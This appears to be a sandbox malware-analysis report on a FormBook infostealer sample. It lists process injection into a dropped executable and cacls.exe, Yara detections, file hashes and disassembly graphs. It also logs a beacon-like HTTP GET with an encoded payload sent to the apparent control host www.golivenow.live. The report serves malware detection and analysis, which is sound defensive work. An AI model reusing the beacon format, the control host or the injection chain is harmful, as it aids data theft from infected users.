                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.75133266.29.149.46806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:07:20.219361067 CET433OUTGET /r2k9/?-pztsZ6x=R82aEe+RY/7ruopLPiKRJqOVryxP2PLUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z4XbG+3l1So+gPg3dZW44XObjN+WC+Ppk5idK3Qy4ode17oimlo20fhs9&jHc=_xZhxrExRJpXy4 HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.golivenow.live
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Jan 11, 2025 04:07:20.828409910 CET652INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 03:07:20 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:22:05:20
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\PGK60fNNCZ.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\PGK60fNNCZ.exe"
                                                          Imagebase:0x430000
                                                          File size:763'904 bytes
                                                          MD5 hash:BE729FE26E81CB5D5AB76FA5A235ACCB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:22:05:23
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\PGK60fNNCZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\PGK60fNNCZ.exe"
                                                          Imagebase:0x370000
                                                          File size:763'904 bytes
                                                          MD5 hash:BE729FE26E81CB5D5AB76FA5A235ACCB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:22:05:23
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\PGK60fNNCZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\PGK60fNNCZ.exe"
                                                          Imagebase:0x430000
                                                          File size:763'904 bytes
                                                          MD5 hash:BE729FE26E81CB5D5AB76FA5A235ACCB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:22:05:23
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\PGK60fNNCZ.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\PGK60fNNCZ.exe"
                                                          Imagebase:0x4b0000
                                                          File size:763'904 bytes
                                                          MD5 hash:BE729FE26E81CB5D5AB76FA5A235ACCB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1866845712.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1867011916.0000000001460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:23:56:26
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe"
                                                          Imagebase:0x7f0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2551691593.00000000028C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:9
                                                          Start time:23:56:27
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\cacls.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\cacls.exe"
                                                          Imagebase:0xc20000
                                                          File size:27'648 bytes
                                                          MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2549473892.0000000003110000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2549241297.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:12
                                                          Start time:23:56:40
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe"
                                                          Imagebase:0x7f0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2550953930.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:14
                                                          Start time:23:56:53
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff722870000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:8.2%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:97
                                                            Total number of Limit Nodes:3
                                                            execution_graph 28894 27ccd68 28895 27ccdae 28894->28895 28899 27ccf48 28895->28899 28902 27ccf47 28895->28902 28896 27cce9b 28905 27cb440 28899->28905 28903 27ccf76 28902->28903 28904 27cb440 DuplicateHandle 28902->28904 28903->28896 28904->28903 28906 27ccfb0 DuplicateHandle 28905->28906 28907 27ccf76 28906->28907 28907->28896 28908 27c4528 28909 27c4549 28908->28909 28912 27c4300 28909->28912 28911 27c4550 28913 27c430b 28912->28913 28916 27c4310 28913->28916 28915 27c46e5 28915->28911 28917 27c431b 28916->28917 28920 27c4330 28917->28920 28919 27c487d 28919->28915 28921 27c433b 28920->28921 28924 27c4360 28921->28924 28923 27c495a 28923->28919 28925 27c436b 28924->28925 28928 27c4390 28925->28928 28927 27c4a5c 28927->28923 28929 27c439b 28928->28929 28930 27c7910 28929->28930 28937 27c7bb8 28929->28937 28943 27c7674 28930->28943 28932 27c7ba9 28932->28927 28933 27c7980 28933->28932 28948 27cc689 28933->28948 28954 27cc698 28933->28954 28938 27c7b8d 28937->28938 28940 27c7bbf 28937->28940 28939 27c7ba9 28938->28939 28941 27cc698 2 API calls 28938->28941 28942 27cc689 2 API calls 28938->28942 28939->28930 28940->28930 28941->28939 28942->28939 28944 27c767f 28943->28944 28945 27c916a 28944->28945 28959 27c91c8 28944->28959 28963 27c91b8 28944->28963 28945->28933 28949 27cc666 28948->28949 28950 27cc697 28948->28950 28949->28932 28951 27cc6dd 28950->28951 28967 27cc848 28950->28967 28971 27cc805 28950->28971 28951->28932 28955 27cc6b9 28954->28955 28956 27cc6dd 28955->28956 28957 27cc848 2 API calls 28955->28957 28958 27cc805 2 API calls 28955->28958 28956->28932 28957->28956 28958->28956 28960 27c920b 28959->28960 28961 27c9216 KiUserCallbackDispatcher 28960->28961 28962 27c9240 28960->28962 28961->28962 28962->28945 28964 27c920b 28963->28964 28965 27c9216 KiUserCallbackDispatcher 28964->28965 28966 27c9240 28964->28966 28965->28966 28966->28945 28969 27cc855 28967->28969 28968 27cc88f 28968->28951 28969->28968 28975 27cb420 28969->28975 28972 27cc7e6 28971->28972 28972->28971 28973 27cc88f 28972->28973 28974 27cb420 2 API calls 28972->28974 28973->28951 28974->28973 28976 27cb42b 28975->28976 28978 27cd5a8 28976->28978 28979 27cca44 28976->28979 28978->28978 28980 27cca4f 28979->28980 28981 27c4390 2 API calls 28980->28981 28982 27cd617 28981->28982 28982->28978 28983 27ca5d0 28987 27ca6c8 28983->28987 28997 27ca6b8 28983->28997 28984 27ca5df 28988 27ca6d9 28987->28988 28991 27ca6fc 28987->28991 29007 27c8974 28988->29007 28991->28984 28992 27ca6f4 28992->28991 28993 27ca900 GetModuleHandleW 28992->28993 28994 27ca92d 28993->28994 28994->28984 28998 27ca6d9 28997->28998 29001 27ca6fc 28997->29001 28999 27c8974 GetModuleHandleW 28998->28999 29000 27ca6e4 28999->29000 29000->29001 29005 27ca960 GetModuleHandleW 29000->29005 29006 27ca951 GetModuleHandleW 29000->29006 29001->28984 29002 27ca6f4 29002->29001 29003 27ca900 GetModuleHandleW 29002->29003 29004 27ca92d 29003->29004 29004->28984 29005->29002 29006->29002 29008 27ca8b8 GetModuleHandleW 29007->29008 29010 27ca6e4 29008->29010 29010->28991 29011 27ca960 29010->29011 29014 27ca951 29010->29014 29012 27c8974 GetModuleHandleW 29011->29012 29013 27ca974 29012->29013 29013->28992 29015 27c8974 GetModuleHandleW 29014->29015 29016 27ca974 29014->29016 29015->29016 29016->28992

                                                            Executed Functions

                                                            Function 059BD9F9 Relevance: .1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 269c1cb2e8fb1fb540195ab6faee8d51722cfb0cddf3a3b50d61fdd92122879f
                                                            • Instruction ID: c1bf58596624f8626fe7e76c550114645499979e7c6c784a8574e954c6e0b0cb
                                                            • Opcode Fuzzy Hash: 269c1cb2e8fb1fb540195ab6faee8d51722cfb0cddf3a3b50d61fdd92122879f
                                                            • Instruction Fuzzy Hash: 9A2126B1D056189BEB18CFA6D9453DEBEF7AFC8300F04C16AD409B62A4DB7409498FA0
                                                            Function 059B5E50 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 526 59b5e50-59b5e6f 527 59b5e91-59b5e98 526->527 528 59b5ea3-59b5ee6 527->528 533 59b5eec-59b5f00 528->533 534 59b5fb3-59b5fc7 528->534 533->534 535 59b5f06-59b5f11 533->535 535->534 536 59b5f17-59b5f27 535->536 536->534 538 59b5f2d-59b5f3c 536->538 539 59b5e71-59b5e74 538->539 540 59b5e7d-59b5e8f 539->540 541 59b5e76 539->541 540->539 541->527 541->540 542 59b5f83-59b5f87 541->542 543 59b5f41-59b5f47 541->543 544 59b5f89-59b5f92 542->544 545 59b5fa8 542->545 547 59b5f4b-59b5f57 543->547 548 59b5f49 543->548 549 59b5f99-59b5f9c 544->549 550 59b5f94-59b5f97 544->550 552 59b5fab-59b5fb2 545->552 551 59b5f59-59b5f68 547->551 548->551 553 59b5fa6 549->553 550->553 556 59b5f6a-59b5f70 551->556 557 59b5f80 551->557 553->552 558 59b5f72 556->558 559 59b5f74-59b5f76 556->559 557->542 558->557 559->557
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8q$8q$$q$$q$$q$$q
                                                            • API String ID: 0-1437537081
                                                            • Opcode ID: ca687355acb2b98c324fe8b6afe53c2176b33a6bcb622ed2d0afa8f2e45131b6
                                                            • Instruction ID: 8bdc391fd492a90114f1a3a1176eb49a614285d0fcc2c90f97527a125653c0f0
                                                            • Opcode Fuzzy Hash: ca687355acb2b98c324fe8b6afe53c2176b33a6bcb622ed2d0afa8f2e45131b6
                                                            • Instruction Fuzzy Hash: E441E130B04205DFF7148B68DA49BBEBBB6BF85305F15486AE405AB391E6B58C41CB92
                                                            Function 059B52F0 Relevance: 6.4, Strings: 5, Instructions: 140COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 560 59b52f0-59b5310 561 59b5349-59b536e 560->561 564 59b5373-59b537d 561->564 565 59b5370 561->565 566 59b537f-59b5384 564->566 567 59b5386-59b5389 564->567 565->564 568 59b538c-59b539e 566->568 567->568 570 59b5312-59b5315 568->570 571 59b531e-59b5335 570->571 572 59b5317 570->572 596 59b533b-59b5347 571->596 597 59b54af-59b54bb 571->597 572->561 572->571 573 59b540b-59b5411 572->573 574 59b548a-59b548e 572->574 575 59b5448-59b544f 572->575 576 59b543e-59b5443 572->576 577 59b53ad-59b53ca 572->577 578 59b53a3-59b53a8 572->578 579 59b5472-59b5478 572->579 580 59b5454-59b545f 572->580 583 59b5413-59b5415 573->583 584 59b5417-59b5423 573->584 585 59b5490-59b5499 574->585 586 59b54a4 574->586 575->570 576->570 601 59b53cc-59b53d2 577->601 602 59b53e2-59b53f3 577->602 578->570 581 59b547a 579->581 582 59b547c 579->582 588 59b546b-59b5470 580->588 589 59b5461 580->589 591 59b547e-59b5487 581->591 582->591 592 59b5425-59b5434 583->592 584->592 593 59b549b-59b549e 585->593 594 59b54a0 585->594 598 59b54a7-59b54ae 586->598 590 59b5466 588->590 589->590 590->570 591->574 592->576 600 59b54a2 593->600 594->600 596->570 600->598 604 59b53d6-59b53d8 601->604 605 59b53d4 601->605 607 59b53fe-59b5406 602->607 604->602 605->602 607->570
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LRq$LRq$$q$$q$$q
                                                            • API String ID: 0-947498194
                                                            • Opcode ID: ebf55405466272794edc2076714adfc2a74f396db1b104107bfc867e2fbc205a
                                                            • Instruction ID: 460693f07e31f55146565fa0eb310bdcee8b847a8e2c76021d89785df5e22883
                                                            • Opcode Fuzzy Hash: ebf55405466272794edc2076714adfc2a74f396db1b104107bfc867e2fbc205a
                                                            • Instruction Fuzzy Hash: 6741C330B14209DFFB149B69E981BBE77B7FB44701F16452AF502D7381E6F488418B96
                                                            Function 059B52E3 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 608 59b52e3-59b5310 610 59b5349-59b536e 608->610 613 59b5373-59b537d 610->613 614 59b5370 610->614 615 59b537f-59b5384 613->615 616 59b5386-59b5389 613->616 614->613 617 59b538c-59b539e 615->617 616->617 619 59b5312-59b5315 617->619 620 59b531e-59b5335 619->620 621 59b5317 619->621 645 59b533b-59b5347 620->645 646 59b54af-59b54bb 620->646 621->610 621->620 622 59b540b-59b5411 621->622 623 59b548a-59b548e 621->623 624 59b5448-59b544f 621->624 625 59b543e-59b5443 621->625 626 59b53ad-59b53ca 621->626 627 59b53a3-59b53a8 621->627 628 59b5472-59b5478 621->628 629 59b5454-59b545f 621->629 632 59b5413-59b5415 622->632 633 59b5417-59b5423 622->633 634 59b5490-59b5499 623->634 635 59b54a4 623->635 624->619 625->619 650 59b53cc-59b53d2 626->650 651 59b53e2-59b53f3 626->651 627->619 630 59b547a 628->630 631 59b547c 628->631 637 59b546b-59b5470 629->637 638 59b5461 629->638 640 59b547e-59b5487 630->640 631->640 641 59b5425-59b5434 632->641 633->641 642 59b549b-59b549e 634->642 643 59b54a0 634->643 647 59b54a7-59b54ae 635->647 639 59b5466 637->639 638->639 639->619 640->623 641->625 649 59b54a2 642->649 643->649 645->619 649->647 653 59b53d6-59b53d8 650->653 654 59b53d4 650->654 656 59b53fe-59b5406 651->656 653->651 654->651 656->619
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LRq$$q$$q
                                                            • API String ID: 0-167464460
                                                            • Opcode ID: 5e060b1b365b9154450ec687ae7ebb9d43bc25634b15847625b9553559f0b8ce
                                                            • Instruction ID: 50ed1a077e821e0333f17f958fefaa54f32c0322a43e8b26028017b965e18d15
                                                            • Opcode Fuzzy Hash: 5e060b1b365b9154450ec687ae7ebb9d43bc25634b15847625b9553559f0b8ce
                                                            • Instruction Fuzzy Hash: 6941D231B14208DBFB109E69EA81BFE77B7FB44701F06852AF506E7391E6F488408B56
                                                            Function 027CA6C8 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 689 27ca6c8-27ca6d7 690 27ca6d9-27ca6e6 call 27c8974 689->690 691 27ca703-27ca707 689->691 698 27ca6fc 690->698 699 27ca6e8 690->699 693 27ca709-27ca713 691->693 694 27ca71b-27ca75c 691->694 693->694 700 27ca75e-27ca766 694->700 701 27ca769-27ca777 694->701 698->691 746 27ca6ee call 27ca960 699->746 747 27ca6ee call 27ca951 699->747 700->701 702 27ca779-27ca77e 701->702 703 27ca79b-27ca79d 701->703 705 27ca789 702->705 706 27ca780-27ca787 call 27c9a10 702->706 708 27ca7a0-27ca7a7 703->708 704 27ca6f4-27ca6f6 704->698 707 27ca838-27ca8f8 704->707 710 27ca78b-27ca799 705->710 706->710 739 27ca8fa-27ca8fd 707->739 740 27ca900-27ca92b GetModuleHandleW 707->740 711 27ca7a9-27ca7b1 708->711 712 27ca7b4-27ca7bb 708->712 710->708 711->712 713 27ca7bd-27ca7c5 712->713 714 27ca7c8-27ca7d1 call 27c9a20 712->714 713->714 720 27ca7de-27ca7e3 714->720 721 27ca7d3-27ca7db 714->721 722 27ca7e5-27ca7ec 720->722 723 27ca801-27ca805 720->723 721->720 722->723 725 27ca7ee-27ca7fe call 27c9a30 call 27c9a40 722->725 744 27ca808 call 27cac60 723->744 745 27ca808 call 27cac30 723->745 725->723 728 27ca80b-27ca80e 729 27ca810-27ca82e 728->729 730 27ca831-27ca837 728->730 729->730 739->740 741 27ca92d-27ca933 740->741 742 27ca934-27ca948 740->742 741->742 744->728 745->728 746->704 747->704
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: d7fb5a109d465c17f939a5f065db3634a71dd26bdb291ca51c4e2a5ff2147dba
                                                            • Instruction ID: 76ca71d632a158cd35360e15b7378610ea5973f822f87005baf7da0ee0955760
                                                            • Opcode Fuzzy Hash: d7fb5a109d465c17f939a5f065db3634a71dd26bdb291ca51c4e2a5ff2147dba
                                                            • Instruction Fuzzy Hash: 63713270A00B098FD724DF2AD45579ABBF2FF88304F108A2DD48AD7A50DB34E846CB91
                                                            Function 027CB440 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 857 27cb440-27cd044 DuplicateHandle 859 27cd04d-27cd06a 857->859 860 27cd046-27cd04c 857->860 860->859
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027CCF76,?,?,?,?,?), ref: 027CD037
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: ca3f8c0d44376f293b482a3de0746c02166617c8e12c6790bef78722b3948022
                                                            • Instruction ID: 4e1b01ce2f217c2ceb52fa57880b2ced48f935c314a6621c4b141b2394f644fe
                                                            • Opcode Fuzzy Hash: ca3f8c0d44376f293b482a3de0746c02166617c8e12c6790bef78722b3948022
                                                            • Instruction Fuzzy Hash: 4421E7B5D002489FDB10CFAAD984ADEBBF5EB48310F14801AE918A7350D379A945CFA4
                                                            Function 027CCFA9 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 863 27ccfa9-27cd044 DuplicateHandle 864 27cd04d-27cd06a 863->864 865 27cd046-27cd04c 863->865 865->864
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027CCF76,?,?,?,?,?), ref: 027CD037
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 523d63b4a2e6ff5bcde2ced072bc74adc41a9270cb9585b17cdec3e648c4a7bb
                                                            • Instruction ID: b02c87feec866af1bb6517c67caa4142c609f5f3b017c206b22075c7411453c7
                                                            • Opcode Fuzzy Hash: 523d63b4a2e6ff5bcde2ced072bc74adc41a9270cb9585b17cdec3e648c4a7bb
                                                            • Instruction Fuzzy Hash: C721E3B5D00209DFDB10CFAAD584ADEBBF5FB48320F14802AE918A3250D378A945CF60
                                                            Function 027C91B8 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 868 27c91b8-27c9214 870 27c9216-27c923e KiUserCallbackDispatcher 868->870 871 27c9262-27c927b 868->871 872 27c9247-27c925b 870->872 873 27c9240-27c9246 870->873 872->871 873->872
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 027C922D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 6a9914b1b15deb4eab179f74fc6c34949769818b70357ce6b4cb2253217bc90e
